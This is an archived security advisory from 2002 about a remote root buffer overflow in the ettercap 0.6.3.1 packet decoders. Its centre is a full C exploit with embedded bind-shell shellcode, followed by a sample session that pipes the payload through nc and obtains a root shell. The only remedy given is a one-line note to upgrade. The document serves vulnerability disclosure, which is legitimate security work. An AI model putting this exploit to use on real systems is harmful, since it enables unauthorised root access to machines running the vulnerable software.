Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps A-M :: lnx5106.htm

ettercap remote root vulnerability



18th Feb 2002 [SBWID-5106]
COMMAND

	ettercap remote root vulnerability

SYSTEMS AFFECTED

	 linux version 0.6.3.1, maybe prior.

	

PROBLEM

	Fermín  J.  Serna  found  following,   in   Next   Generation   Security
	Technologies advisory NGSEC-2002-1 [http://www.ngsec.com] :
	

	As it is said in ettercap\'s home  page  \"Ettercap  is  a  multipurpose
	sniffer/interceptor/logger for switched LAN\". Due to  improper  use  of
	the memcpy() function, anyone can crash ettercap  and  execute  code  as
	root user.
	

	This vulnerability only exists on Linux  version  because  on  *BSD  and
	MacOSX ettercap only works on ethernets devices.
	

	 Technical description:

	 -----------------------

	

	Ettercap is composed  of  decoders  which  looks  for  user,  passwords,
	communities and stuff alike.
	

	Several decoders (mysql, irc, ...) suffer the following problem:
	

	

	   memcpy(collector, payload, data_to_ettercap->datalen);

	

	

	Collector is declared as:
	

	

	    u_char collector[MAX_DATA];

	

	

	Where MAX_DATA is:
	

	

	  #define MAX_DATA 2000

	

	

	Datalen is  the  data  (after  TCP/UDP  header)  length  read  from  the
	interface. So on interfaces where  MTU  is  higher  than  2000  you  can
	exploit ettercap. Since normal ethernets have MTU:1500 this bug can  not
	be exploited due to unsupported defragmentation in ettercap, but may  be
	crashed with a forged packet (ip->tot_len > MAX_DATA).
	

	Here are common MTU and interface types:
	

	

	    65535 Hyperchannel

	    17914 16 Mbit/sec token ring

	    8166  Token Bus (IEEE 802.4)

	    4464  4 Mbit/sec token ring (IEEE 802.5)

	    1500  Ethernet

	    1500  PPP (typical; can vary widely)

	

	

	 Exploit for this vulnerability

	 ******************************

	

	

	/* 

	 * ettercap-0.6.3.1 remote root xploit 

	 *

	 * By: Fermín J. Serna <fjserna@ngsec.com>

	 *     Next Generation Security Technologies

	 *     http://www.ngsec.com

	 *

	 * DESCRIPTION:

	 * ============

	 *

	 * Several decoders (mysql, irc, ...) suffer the following problem:

	 *

	 *    memcpy(collector, payload, data_to_ettercap->datalen);

	 *

	 * collector is declared as: 

	 *

	 *    u_char collector[MAX_DATA];

	 * 

	 *  where MAX_DATA is:

	 *

	 *  #define MAX_DATA 2000

	 *

	 *  So on interfaces where MTU is higher than 2000 you can exploit 

	 *  ettercap. Nop, normal ethernets have MTU:1500 ;P

	 *

	 *  Here are common MTU and interface types:

	 * 

	 *    65535 Hyperchannel

	 *    17914 16 Mbit/sec token ring

	 *    8166  Token Bus (IEEE 802.4)

	 *    4464  4 Mbit/sec token ring (IEEE 802.5)

	 *    1500  Ethernet

	 *    1500  PPP (typical; can vary widely)

	 *

	 *  Sample explotation could be also in loopback interfaces: MTU:16436

	 *

	 *  piscis:~# ettercap -NszC -i lo &

	 *  [1] 21887

	 *  piscis:~# ./ettercap-x 0 | nc localhost mysql

	 *  ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>

	 *  Next Generation Security Technologies

	 *  http://www.ngsec.com   

	 *

	 *  punt!

	 *  piscis:~# telnet localhost 36864

	 *  Trying 127.0.0.1...

	 *  Connected to localhost.

	 *  Escape character is \'^]\'.

	 *  id;

	 *  uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

	 *

	 *  Madrid, 5/02/2002

	 *

	 */ 

	

	

	#include <stdio.h>

	#include <string.h>

	

	#define NUM_ADDR 100

	#define NOP 0x41

	#define BUFF_SIZE 2200

	#define RET_ADDR 0xbfffea58

	#define OFFSET 0

	

	char shellcode[]=

	\"\\x1b\\xeb\\x78\\x5e\\x29\\xc0\\x89\\x46\\x10\\x40\\x89\\xc3\\x89\\x46\\x0c\\x40\"

	\"\\x89\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\\x80\\xeb\\x01\\x3C\\x43\\xc6\\x46\"

	\"\\x10\\x10\\x66\\x89\\x5e\\x14\\x88\\x46\\x08\\x29\\xc0\\x89\\xc2\\x89\\x46\\x18\"

	\"\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\"

	\"\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\\xb0\\x66\\xcd\\x80\\x89\\x56\\x0c\\x89\"

	\"\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\xeb\\x01\\x2D\\x86\\xc3\\xb0\\x3f\\x29\\xc9\"

	\"\\xcd\\x80\\xb0\\x3f\\x41\\xcd\\x80\\xb0\\x3f\\x41\\xcd\\x80\\x88\\x56\\x07\\x89\"

	\"\\x76\\x0c\\x87\\xf3\\x8d\\x4b\\x0c\\xb0\\x0b\\xcd\\x80\\xe8\\x83\\xff\\xff\\xff\"

	\"/bin/sh\";

	

	int main(int argc, char **argv) {

	char buffer[BUFF_SIZE];

	char *ch_ptr;

	unsigned long *lg_ptr;

	int aux;

	int offset=OFFSET;

	

	 fprintf(stderr,\"ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>\\n\");

	 fprintf(stderr,\"Next Generation Security Technologies\\n\");

	 fprintf(stderr,\"http://www.ngsec.com\\n\\n\");

	

	

	 if (argc==2) offset=atoi(argv[1]);

	

	 memset(buffer,0,sizeof(buffer));

	

	 ch_ptr=buffer;

	 memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR);

	 ch_ptr+=sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR;

	 memcpy(ch_ptr,shellcode,strlen(shellcode));

	 ch_ptr+=strlen(shellcode);

	 lg_ptr=(unsigned long *)ch_ptr;

	 for (aux=0;aux<NUM_ADDR;aux++) *(lg_ptr++)=RET_ADDR+offset;

	 ch_ptr=(char *)lg_ptr;

	 *ch_ptr=\'\\0\';

	  

	 printf(\"%s\",buffer);

	

	 return(0);

	

	}

	

	       

	Sample exploitation could be also in loopback interfaces: MTU:16436
	

	

	  piscis:~# ettercap -NszC -i lo &

	  [1] 21887

	  piscis:~# ./ettercap-x 0 | nc localhost 3306

	  ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>

	  Next Generation Security Technologies

	  http://www.ngsec.com

	

	  punt!

	  piscis:~# telnet localhost 36864

	  Trying 127.0.0.1...

	  Connected to localhost.

	  Escape character is \'^]\'.

	  id;

	  uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),10(wheel)

	

	

	

SOLUTION

	Upgrate  to  a  newer  ettercap  version.  Run  ettercap  on  a   secure
	environment.
	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH